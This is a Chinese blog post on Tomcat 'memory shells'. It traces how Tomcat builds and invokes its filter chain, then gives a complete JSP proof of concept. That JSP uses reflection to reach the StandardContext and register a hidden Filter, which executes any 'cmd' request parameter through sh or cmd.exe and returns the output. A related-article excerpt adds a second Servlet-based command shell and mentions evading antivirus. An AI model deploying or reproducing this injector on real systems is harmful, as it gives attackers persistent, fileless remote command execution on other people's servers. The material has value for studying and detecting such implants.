Tomcat Java内存马 Filter型

最新推荐文章于 2023-02-13 13:42:34 发布
最新推荐文章于 2023-02-13 13:42:34 发布
阅读量315 收藏
点赞数
分类专栏: Java安全 文章标签: java tomcat servlet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40710190/article/details/125900491
版权

Tomcat Java内存马 Filter型

之所以称为内存马是因为恶意代码是注入到TomcatContext里。

Filter型则是通过把一个编写了恶意代码的Filter注册到Context里,然后触发该恶意Filter来运行恶意代码。当注册成功后,即使把恶意JSP删掉也没有关系,因为恶意Filter已经注册到Context里了,这也是为什么叫内存马的原因。并不依赖于文件。

首先分析一下FilterTomcat里如何注册的。

Filter

Filter的doFilter

Tomcat中一个自定义Filter类需要实现Filter接口,且在doFilter()方法里编写Filter要做的事。

package javax.servlet;

import java.io.IOException;

public interface Filter {
    default void init(FilterConfig filterConfig) throws ServletException {}

    void doFilter(ServletRequest var1, ServletResponse var2, FilterChain var3) throws IOException, ServletException;

    default void destroy() {}
}

先写一个Demo打断点调试一下。

public class FilterDemo01 implements Filter { 

    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {

        System.out.println("FilterDemo01 doFilter"); 
        filterChain.doFilter(servletRequest,servletResponse); // 这里打一个断点

    }

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        //Filter.super.init(filterConfig);
    }

    @Override
    public void destroy() {
        //Filter.super.destroy();
    }
}

web.xml里注册,或者通过@WebFilter注解。触发断点需要访问filterDemo01映射的路径**/servletdemo01**。

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
  <display-name>Archetype Created Web Application</display-name>

  <filter>
    <filter-name>filterDemo01</filter-name>
    <filter-class>filter.FilterDemo01</filter-class>
  </filter>

  <filter-mapping>
    <filter-name>filterDemo01</filter-name>
    <url-pattern>/servletdemo01</url-pattern>
  </filter-mapping>

</web-app>

访问 /servletdemo01路径触发断点。断点为什么要断在filterChain.doFilter(servletRequest,servletResponse)呢?因为在Tomcatfilter链机制,这里不做赘述。

断点停下,调用栈向上分析,通过源码调用doFilter()是在ApplicationFilterChain.internalDoFilter()

//ApplicationFilterChain.java
private void internalDoFilter(ServletRequest request, ServletResponse response)
    throws IOException, ServletException {

    if (pos < n) {
        ApplicationFilterConfig filterConfig = filters[pos++];
        try {
            Filter filter = filterConfig.getFilter();

            if( Globals.IS_SECURITY_ENABLED ) { /*...*/ } else {
                filter.doFilter(request, response, this);
            }
        } catch (IOException | ServletException | RuntimeException e) 
        {throw e;} 
        catch (Throwable e) {e = ExceptionUtils.unwrapInvocationTargetException(e);ExceptionUtils.handleThrowable(e);throw new ServletException(sm.getString("filterChain.filter"), e);}
        return;
    }
}

通过读取自身的字段filters[pos++] 获取ApplicationFilterConfig,该类封装了对应的Filter可以通过getFilter()获取。然后调用doFilter()

//FilterDemo01.java
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {

    System.out.println("FilterDemo01 doFilter");
    filterChain.doFilter(servletRequest,servletResponse);

}

值得一说的是filterChain就是在上面传入的this参数,也就是ApplicationFilterChain.doFilter(),在该方法里会调用internalDoFilter()方法然后通过filters[pos++]调用下一个filterdoFilter()方法。

这就是所谓的Filter链机制,这也解释了为什么每个FilterdoFilter()方法都要写filterChain.doFilter(servletRequest,servletResponse);

Filter的调用

上面分析了怎么调用doFilter()的,接下来就需要分析一下Filter的调用了。

public class FilterDemo01 implements Filter { // 这里打一个断点
	/*...*/
}

接着上一部分的ApplicationFilterChain.doFilter()往上再看一层,是StandardWrapperValve.invoke()。根据注释createFilterChain()就是创建Filter链的。

//StandardWrapperValve.java
public final void invoke(Request request, Response response) throws IOException, ServletException{
    
     // Create the filter chain for this request
        ApplicationFilterChain filterChain =
                ApplicationFilterFactory.createFilterChain(request, wrapper, servlet);
    
    filterChain.doFilter(request.getRequest(), response.getResponse());
    
}

createFilterChain()中,会将这次request里的过滤器都加入到Filter链中。

public static ApplicationFilterChain createFilterChain(ServletRequest request,Wrapper wrapper, Servlet servlet){

    // Create and initialize a filter chain object
    ApplicationFilterChain filterChain = null;
    if (request instanceof Request) {
        Request req = (Request) request;
        if (Globals.IS_SECURITY_ENABLED) {
            // Security: Do not recycle
            filterChain = new ApplicationFilterChain();
        } else {
            filterChain = (ApplicationFilterChain) req.getFilterChain();
            if (filterChain == null) {
                filterChain = new ApplicationFilterChain();
                req.setFilterChain(filterChain);
            }
        }
    } else {
        // Request dispatcher in use
        filterChain = new ApplicationFilterChain();
    }

    // Acquire the filter mappings for this Context
    StandardContext context = (StandardContext) wrapper.getParent();
    FilterMap filterMaps[] = context.findFilterMaps();

    // Add the relevant path-mapped filters to this filter chain
    for (FilterMap filterMap : filterMaps) {
        if (!matchDispatcher(filterMap, dispatcher)) {
            continue;
        }
        if (!matchFiltersURL(filterMap, requestPath)) {
            continue;
        }
        ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)
            context.findFilterConfig(filterMap.getFilterName());
        if (filterConfig == null) {
            // FIXME - log configuration problem
            continue;
        }
        filterChain.addFilter(filterConfig);
    }

    // Add filters that match on servlet name second
    for (FilterMap filterMap : filterMaps) {
        if (!matchDispatcher(filterMap, dispatcher)) {
            continue;
        }
        if (!matchFiltersServlet(filterMap, servletName)) {
            continue;
        }
        ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)
            context.findFilterConfig(filterMap.getFilterName());
        if (filterConfig == null) {
            // FIXME - log configuration problem
            continue;
        }
        filterChain.addFilter(filterConfig);
    }

}

首先初始化一个ApplicationFilterChain类型的filterChain,然后从wrapper获得StandardContext,然后从StandardContext获得filterMaps[] 数组。

// Acquire the filter mappings for this Context
StandardContext context = (StandardContext) wrapper.getParent();
FilterMap filterMaps[] = context.findFilterMaps()

接下来遍历filterMaps数组,将符合条件的Filter加到Filter链里。

for (FilterMap filterMap : filterMaps) {
    if (!matchDispatcher(filterMap, dispatcher)) {
        continue;
    }
    if (!matchFiltersURL(filterMap, requestPath)) {
        continue;
    }
    ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)
        context.findFilterConfig(filterMap.getFilterName());
    if (filterConfig == null) {
        // FIXME - log configuration problem
        continue;
    }
    filterChain.addFilter(filterConfig);
}

// Add filters that match on servlet name second
for (FilterMap filterMap : filterMaps) {
    if (!matchDispatcher(filterMap, dispatcher)) {
        continue;
    }
    if (!matchFiltersServlet(filterMap, servletName)) {
        continue;
    }
    ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)
        context.findFilterConfig(filterMap.getFilterName());
    if (filterConfig == null) {
        // FIXME - log configuration problem
        continue;
    }
    filterChain.addFilter(filterConfig);
}

注意第一次是检查URL是否匹配,第二回是检测Servlet是否匹配,filterMapsweb.xml<filter> 配置项里按照顺序依次读取Filter并进行匹配,符合条件的就加入本次requestFilter链里。

//ApplicationFilterChain.java
void addFilter(ApplicationFilterConfig filterConfig) {

    // Prevent the same filter being added multiple times
    for(ApplicationFilterConfig filter:filters) {
        if(filter==filterConfig) {
            return;
        }
    }

    filters[n++] = filterConfig;

}

并且可以看到就是把filterConfig加到链里,而这个filterConfig在上面是通过

ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)
        context.findFilterConfig(filterMap.getFilterName());

得到的。

Poc

通过上面的分析已知,我们需要构造的是filterConfigfilterMaps,且都可以从StandardContext中获得。

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.Map" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.util.Scanner" %>
<%@ page import="org.apache.catalina.connector.Request" %>

<%
    final String name = "2233";
//    获取上下文
//    ServletContext servletContext = request.getSession().getServletContext();
//
//    Field appctx = servletContext.getClass().getDeclaredField("context");
//    appctx.setAccessible(true);
//    ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
//
//    Field stdctx = applicationContext.getClass().getDeclaredField("context");
//    stdctx.setAccessible(true);
//    StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);

    Field reqF = request.getClass().getDeclaredField("request");
    reqF.setAccessible(true);
    Request req = (Request) reqF.get(request);
    StandardContext standardContext = (StandardContext) req.getContext();

    Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
    Configs.setAccessible(true);
    Map filterConfigs = (Map) Configs.get(standardContext);

    if (filterConfigs.get(name) == null){
        Filter filter = new Filter() {
            @Override
            public void init(FilterConfig filterConfig) throws ServletException {

            }

            @Override
            public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                HttpServletRequest req = (HttpServletRequest) servletRequest;
                if (req.getParameter("cmd") != null) {
                    boolean isLinux = true;
                    String osTyp = System.getProperty("os.name");
                    if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                        isLinux = false;
                    }
                    String[] cmds = isLinux ? new String[] {"sh", "-c", req.getParameter("cmd")} : new String[] {"cmd.exe", "/c", req.getParameter("cmd")};
                    InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                    Scanner s = new Scanner( in ).useDelimiter("\\a");
                    String output = s.hasNext() ? s.next() : "";
                    servletResponse.getWriter().write(output);
                    servletResponse.getWriter().flush();
                    return;
                }
                filterChain.doFilter(servletRequest, servletResponse);
            }

            @Override
            public void destroy() {

            }

        };

        FilterDef filterDef = new FilterDef();
        filterDef.setFilter(filter);
        filterDef.setFilterName(name);
        filterDef.setFilterClass(filter.getClass().getName());
        standardContext.addFilterDef(filterDef);

        FilterMap filterMap = new FilterMap();
        filterMap.addURLPattern("/2233");
        filterMap.setFilterName(name);
        filterMap.setDispatcher(DispatcherType.REQUEST.name());

        standardContext.addFilterMapBefore(filterMap);

        Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
        constructor.setAccessible(true);
        ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);

        filterConfigs.put(name, filterConfig);
        out.print("Inject Success !");
    }
%>
<html>
<head>
    <title>poc</title>
</head>
<body>
hello poc2
</body>
</html>

参考文章:

Java Tomcat内存——filter内存
m0_61506558的博客
11-17 723
至此,invoke()部分的所有流程我们都分析完毕了,接着继续往上看,也就是doFilter()方法。这个doFilter()方法也是由最近的那个invoke()方法调用的。如图,我们把断点下过去。如果师傅们这个invoke()方法可用的话,可以断点下这里,如果不可用的话可以下到后面doFilter()方法。这里我们要重点关注前文说过的这个变量,那它是什么呢?我们跟进这个方法。使用创建了一个过滤链,将进行传递。我们在方法走一下流程。
Java Tomcat内存——Servlet内存
m0_61506558的博客
11-27 631
Java Servlet 是运行在 Web 服务器或应用服务器上的程序,它是作为来自 Web 浏览器或其他 HTTP 客户端的请求和 HTTP 服务器上的数据库或应用程序之间的中间层。使用 Servlet,您可以收集来自网页表单的用户输入,呈现来自数据库或者其他源的记录,还可以动态创建网页。Java Servlet 通常情况下与使用 CGI(Common Gateway Interface,公共网关接口)实现的程序可以达到异曲同工的效果
tomcat Filter内存
weixin_45682070的博客
02-16 1473
Tomcat Filter 流程分析 首先创建一个javaWeb项目,再把tomcat/lib/catalina.jar和tomcat/lib/servlet-api.jar添加到项目中,创建一个demo文件。如果不会的化可以参考这篇文章 demo package filter; import javax.servlet.*; import java.io.IOException; public class filterDemo implements Filter { public void
ServletFilter详解及demo
SecondDream_1017的博客
08-16 347
原出处:https://blog.youkuaiyun.com/u010902721/article/details/51673760 Filter(过滤器)的功能 Filter顾名思义就是针对浏览器的请求进行过滤,甚至是拦截。它可以在一个请求到达servlet之前进行请求的预处理,在一个请求离开servlet后,到达浏览器之前进行后处理。多个Filter可以组成Filter Chain(过滤器链)。 F...
Tomcat 学习之 断点调试环境搭建
zxguan 的博客
10-22 541
Tomcat 学习之 断点调试环境搭建背景下载源码1、.zip 压缩包2、tar.gz 包3、git 仓库搭建步骤 背景 Tomcat 作为主流的 Web 容器之一,掌握其源码极其重要。 下载源码 1、.zip 压缩包 2、tar.gz 包 3、git 仓库 搭建步骤 1、解压,并在根目录下新建 home 目录、pom.xml 文件 pom.xml 内容如下: <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://ma
tomcat打debug断点调试
qq_42873640的博客
02-13 4453
tomcat断点调试
Tomcat Java内存 listener
qq_40710190的博客
07-20 313
针对Tomcat Listener的内存
【安全记录】基于TomcatJava内存初探
君行路的博客
08-22 526
文章目录1. 前言2. 基础知识2.1 servletfilter2.2 servletfilter 的生命周期2.3 Tomcat 的 Container – 容器组件2.4 Tomcat中的启动加载顺序3. 内存技术实现介绍3.1 获取上下文对象 ServletContext3.1.1 通过当前 request 对象获取 ServletContext3.1.2 通过 `Thread.currentThread().getContextClassLoader()` 获取 StandardCo
S04-tomcatFilter内存1
08-03
【标题】:"S04-tomcatFilter内存1" 【描述】:"理解Tomcat中的Filter内存,涉及servlet-api以及Tomcat组件动态注册的实现,关注Filter的生命周期和内存的创建思路。" 在Java Web开发中,Tomcat作为常用的...
第四篇 Fiddler-设置断点
weixin_44629511的博客
03-11 2334
断点的两种位置 before response:这个是打在request请求的时候,未达服务器之前 after response:打在服务器响应之后,在Fiddler将响应传回给客户端之前 打断点的方式 一、全局断点 全局断点会终端fiddler捕获的所有请求,设置方法: 点击rules-> automatic breakpoint ->before requests [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-C75lu4B5-164697910177
tomcat 责任链设计模式 底层源码剖析
javapolo的博客
12-01 969
今天晚上花了些时间debug了下tomcat,注意观察了下tomcat内部过滤器的实现,其实tomcat内部过滤器采用了责任链的设计模式, (其实struts2拦截器那一块采用了相似的设计模式),以下是个人对源码的解读, ApplicationFilterChain详解 首先是对该类的定义的介绍/** * Implementation of &lt;code&gt;javax.servlet...
JavaWeb过滤器(Filter)详解,是时候该把过滤器彻底搞懂了(万字说明)
热门推荐
秃头披风侠的博客
03-23 6万+
注意:这篇文章很长,学习完后将会解决你对于过滤器(Filter)的所有疑惑,下面将通过理论和代码的结合来进行讲解演示..... 目录 基本介绍 过滤器原理 过滤器(Filter)接口 使用过滤器(Filter) 创建过滤器(Fliter) 使用过滤器(Filter) 配置过滤器(Filter)拦截路径 注解方式 xml方式 过滤器(Filter)生命周期 理论说明 代码演示 FilterConfig和FilterChain说明 FilterConfi...
jvm tomcat远程 断点 debug调试
u010648190的专栏
07-24 1736
 JVM、TOMCAT 远程断点调试 1      基于JVM远程调试 1.1    演示 本例子演示java命令对jar或者class远程断点调试。 以一个简单的jar为例,先生成可运行jar 图 1   图 2   图 3     图 4
tomcat模式下不能成功进入debug模式,断点不起作用
zhuifengshaonian201的博客
05-10 9980
一、问题javaSE项目进入debug模式正常启动,而tomcat启动web项目进入debug模式,断点不起作用,按照网上各种方法试了个遍,都不行。二、原因根本原因是idea自带的环境与tomcat带的环境有了冲突,因为我们的idea默认启动是catalina.bat启动,而我的catalina.bat里配置参数:JAVA_OPTS=-Xmx1024M -Xms512M -XX:MaxPermSi...
Intellij idea远程debug连接tomcat,实现单步调试
程序员欣宸的博客
06-17 1万+
Intellij idea远程debug连接tomcat
eclipse外部启动tomcat如何进行断点调试
山里人的博客
08-18 5087
首先我们打开tomcat的bin目录,找到catalina.bat文件   进入该文件,搜索JPDA_ADDRESS,查看你tomcat的外部启动端口 进入eclipse,选择debug信息配置 配置debug端口和名称 打开debug控制台 检测是否外部调试成功 打一个断点,进行测试,记得切换到debug界面 调试完,记得删除所有断点,否则会影...
如何断点调试Tomcat源码
weixin_34253126的博客
06-04 1132
如何断点调试Tomcat源码 Tomcat作为一个老牌的一个Web容器框架,用途十分的广泛。无论是为了学习其框架的整体设计还是为了碰到问题更好的解决,作为程序员我们都应该对于Tomcat有一定的了解。而了解一个框架最好的办法就是看官方文档,但是有时候官方文档解答不了我们的问题,这时候就需要看源码了。 无论是使用编译器Idea还是Eclipse,或者是内嵌Tomcat的SpringBoot,我们都无...
Eclipse远程调试Tomcat
德平的专栏
01-24 4万+
最近,一直在研究Tomcat的工作内幕,主要的方法就是参考《How Tomcat Works》这本书和Tomcat 5.5.26的源代码。 Tomcat的代码结构还是比较清晰的,注释也比较全。但是代码毕竟是静态的,难以彻底弄清类与类之间的协作关系,以及运行时对象的交互关系。 如果能对Tomcat的启动、处理请求和停止的过程进行断点调试,看清Tomcat的每一步行踪,那么就能
IDEA - Tomcat - 断点调试
IF
03-12 1662
1、使用‘小虫子’启动,debug启动。 2、在需要调试的地方,打断点即可。
tomcat内存复现
最新发布
04-01
### 关于Tomcat内存漏洞复现的方法 #### 背景介绍 Tomcat 是一款广泛使用的开源 Web 应用服务器,支持 Java Servlet 和 JSP 技术。由于其开放性和灵活性,在实际部署过程中可能存在多种安全隐患,其中一种较为隐蔽的安全威胁就是 **内存** 的利用方式[^3]。 内存是一种不依赖物理文件存储的恶意代码植入技术,通过动态加载的方式将恶意逻辑注入到 JVM 运行环境中,使得攻击者能够在无需留下任何磁盘痕迹的情况下实现远程命令执行或其他恶意行为[^4]。 --- #### 内存的工作原理 内存的核心机制在于绕过传统的基于文件检测的安全防护手段。具体来说,它可以通过以下几种方式进行植入: 1. **修改已有类的行为**: 动态代理或反射技术可以改变某些核心组件的功能。 2. **注册自定义Servlet**: 利用容器特性向 Tomcat 注册新的 Servlet 实例来监听特定路径请求并返回恶意响应。 3. **使用Filter拦截器**: 插入过滤链中的 Filter 对象可以在每次 HTTP 请求到达之前或者之后实施控制操作。 4. **JNDI注入**: 如果应用程序允许外部配置资源绑定,则可能被用来引入危险对象实例化过程。 这些方法均不需要创建额外的实际文件即可完成整个攻击流程。 --- #### 复现环境准备 为了成功模拟一次针对 Tomcat内存攻击实验,请按照如下步骤搭建测试平台: - 安装目标版本的 Apache Tomcat (需注意选择易受攻击的具体发行版号)[^2]; - 配置好 JDK 环境以及必要的开发工具; - 准备一台单独用于试验目的虚拟机或者其他隔离网络区域内的主机作为受害方节点; > 特别提醒:所有渗透测试活动都应在授权范围内开展,并严格遵循当地法律法规! --- #### 具体实践案例——Servlet内存构建演示 下面给出一段简单的 Java 代码片段展示如何手动构造一个基础形态下的 Servlet内存: ```java import javax.servlet.*; import javax.servlet.http.*; import java.io.*; public class MemoryShell extends HttpServlet { public void doGet(HttpServletRequest req, HttpServletResponse res) throws IOException{ String cmd = req.getParameter("cmd"); Process p = Runtime.getRuntime().exec(cmd); InputStream is = p.getInputStream(); BufferedReader br = new BufferedReader(new InputStreamReader(is)); StringBuilder sb=new StringBuilder(); String line=null; while( (line=br.readLine())!=null ) { sb.append(line).append("\n"); } PrintWriter out=res.getWriter(); out.println(sb.toString()); } } ``` 此脚本实现了基本功能:接收客户端 GET 参数 `cmd` 所指定的操作系统指令字符串参数并通过标准库函数调用本地 shell 来获取结果反馈给访问者。 随后可通过某种途径(如 RCE 漏洞)将此类字节码序列传送到服务端内存空间内激活生效。 --- #### 注意事项 尽管上述例子便于理解概念本身,但在真实世界场景下还需要考虑更多因素才能达到理想效果,比如规避杀软查杀、隐藏特征签名等等高级技巧。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值